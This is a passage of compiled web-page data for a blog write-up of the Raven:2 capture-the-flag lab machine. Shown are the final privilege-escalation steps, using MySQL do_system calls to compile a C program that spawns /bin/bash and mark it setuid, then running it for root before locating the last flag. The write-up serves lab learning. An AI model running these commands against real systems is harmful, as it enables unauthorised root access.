\"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token string\"\n }), \"\\\"/bin/bash\\\"\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"}\")))), mdx(\"p\", null, \"Put above C source code at \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/tmp/pe.c\"), \", then compile it from MySQL prompt:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"mysql\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-mysql\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-mysql\"\n }), \"select do_system('gcc /tmp/pe.c -o /tmp/pe');\"))), mdx(\"p\", null, \"Followed with set uid command:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"mysql\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-mysql\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-mysql\"\n }), \"select do_system('chmod u+s /tmp/pe');\"))), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/41aad6c6e1d9c4987c4675b476f19ddc/00d43/raven-052428.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACWUlEQVQoz22SXW/TMBSGI02sm1RxMcRot9CPJE3TJU3z5cSJ4yalHWUXoynT2FeENu2On8AFF/xsqH2QM1ZG2cWjY1vye97z2hJK81fHp2c3xx/Py+PF53JeXJTvFxflfHlZzk7Py5Oz67K4ui3PyvtyeX1XzovL8sPy6i+frsS9m5v7r1++ff/RkDS9P81nc6CTGUQJBYQJhEkKQZQATjOI0wxoPoUoSSHEBLwQg7+BhyIg4xxQhAup1WpNU5oBxsnK84OVaVrMcVxmGAaLY8IQCpkfIGZZQzYYDJiqKpusNFX9qSoK7O+/LqR2pzPNJjOg4wlHYcTtkcN9H3HTtDhJxzwhlEc45inNeZykvNfrcV3XN1n1+32QZbmQZPntNCEUUIgrwQCFEOEERiMH4iQFHJOqBigCyxqCruvQ6/Wq+me9Fjw8PHwQxHECnufzoW1zx/XA9XwY2nYlao8ccBwXTNMCTdOeCj0v2Gq31w7FuEdHJgyHNhjGADw/qMQE4sKGs+cFRYb5O5FhziOccOFKjC0c0WwCSTquRhYxiPNN0f8dttrTlOYgwvf8gNn2iLuez49Mk+OYVE0Qiqp1gMLqUZ7y9FEqwUajOaPjSRV6GGHxfYCkGfgBEk0qd4Q+7A3DqEZ/dPjoUtM0JurBwcFSGjlufnt7x2zLEv9s5QaI2Y7Dut0uU1V1jaIorNPp/IM48zyPUUp/ZVkmGpxKxmBQLxYLLDebZG9vj8idLnnTbJCtrS1Sq22T7W3BC1Kr1cju7u6anZ0dUq/XiaIoxHEcEgRBoijKy986eUeqK7RmEgAAAABJRU5ErkJggg==')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"compile\",\n \"title\": \"compile\",\n \"src\": \"/static/41aad6c6e1d9c4987c4675b476f19ddc/fcda8/raven-052428.png\",\n \"srcSet\": [\"/static/41aad6c6e1d9c4987c4675b476f19ddc/12f09/raven-052428.png 148w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/e4a3f/raven-052428.png 295w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/fcda8/raven-052428.png 590w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/efc66/raven-052428.png 885w\", \"/static/41aad6c6e1d9c4987c4675b476f19ddc/00d43/raven-052428.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"h4\", null, \"Get flag4\"), mdx(\"p\", null, \"Execute \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"/tmp/pe\"), \" from a low privilege shell, and successfully upgraded to root.\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/d3542be587ac7f76a427c26897f18719/00d43/raven-root.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"60.13513513513513%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACFElEQVQoz4WRXW/aMBSGuUEqiPVi1RgkICETEkhI7DhfgAnQZi29GOKjaldENq3jbj9hF7vYz96Iz+RQ2IBOu3j0OpH9+JzjjBdeXtxM71fj2Yf4Zip4iMfzx/h2sUzz/f3H+C5ex4vVl3i2/ByPZ4/x7Xz5h8Uyvp4+rFbrr5++ff9RyiBFjQZX19DtD8Hv9iHoheD4XaBekCLWQW/7XyT1O+AcIfaxwQi8oDPLVCqVqNvrg+t6G9fzNxiTpKlpiSZQ1TRVVU3qdZTUEdrmIRulXv9ZRwiKxTdb4fAygsHoirNwyP2gw4lNuWlavG2a3LJwSrPZ5Kqq/ouNpmlQqVRmGUmSI9YfgB90OSY2tzAGga7roCjKnkajAaqq7nNHo9HYC2VZFkIparZaYBgGb7dNbhgGWBaGdttMRUeHD75fFJbLUiQqsm3KnwFiU8DEBl039qIdx+IToSzLkecF4Pkd7rgep9QFx/WAOm7KVqyfyP665LRl0aJpWWKGye4RLEy4bTscY5I+kphvq6XzZ0Gau/WBsFqtvhMt2tRJK3NEZdQFjMl2lqYpLktnum1TO5mroiiJSEmS5pm2aY6entZJJ+gmjuNu2GCUWIQktVrtvyCEEkppEobhr+FwCJqmTTItXS9MJ5NO8eI1O39VYKVqlb0tl1g2m2X5fJ7lcrkXOTs7Y4VCgSGEGCGEua7bQwid/wZ4cEBOhPhLqwAAAABJRU5ErkJggg==')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"root\",\n \"title\": \"root\",\n \"src\": \"/static/d3542be587ac7f76a427c26897f18719/fcda8/raven-root.png\",\n \"srcSet\": [\"/static/d3542be587ac7f76a427c26897f18719/12f09/raven-root.png 148w\", \"/static/d3542be587ac7f76a427c26897f18719/e4a3f/raven-root.png 295w\", \"/static/d3542be587ac7f76a427c26897f18719/fcda8/raven-root.png 590w\", \"/static/d3542be587ac7f76a427c26897f18719/efc66/raven-root.png 885w\", \"/static/d3542be587ac7f76a427c26897f18719/00d43/raven-root.png 1000w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"h4\", null, \"Get flag3\"), mdx(\"p\", null, \"After flag4 obtained, I still didn\\u2019t know whereabouts of flag3. In that case, I head back to MySQL database again. Dig deeper into every tables from database \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"wordpress\"), \". And finally, find out flag3 is an image attachment file from a blog post, and its url is \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png\"\n }), \"http://raven.local/wordpress/wp-content/uploads/2018/11/flag3.png\"), \".\"), mdx(\"p\", null, \"Done! \\uD83C\\uDF89\"));\n}\n;\nMDXContent.isMDXComponent = true;","frontmatter":{"title":"Raven:2 Writeup","date":"July 08, 2020","description":null}}},"pageContext":{"slug":"/raven:2-writeup/","previous":{"fields":{"slug":"/msf-payload-analysis-i/"},"frontmatter":{"title":"MSF Payload Analysis I"}},"next":{"fields":{"slug":"/a-newbie-geolocation-practice/"},"frontmatter":{"title":"A Newbie Geolocation Practice"}}}}}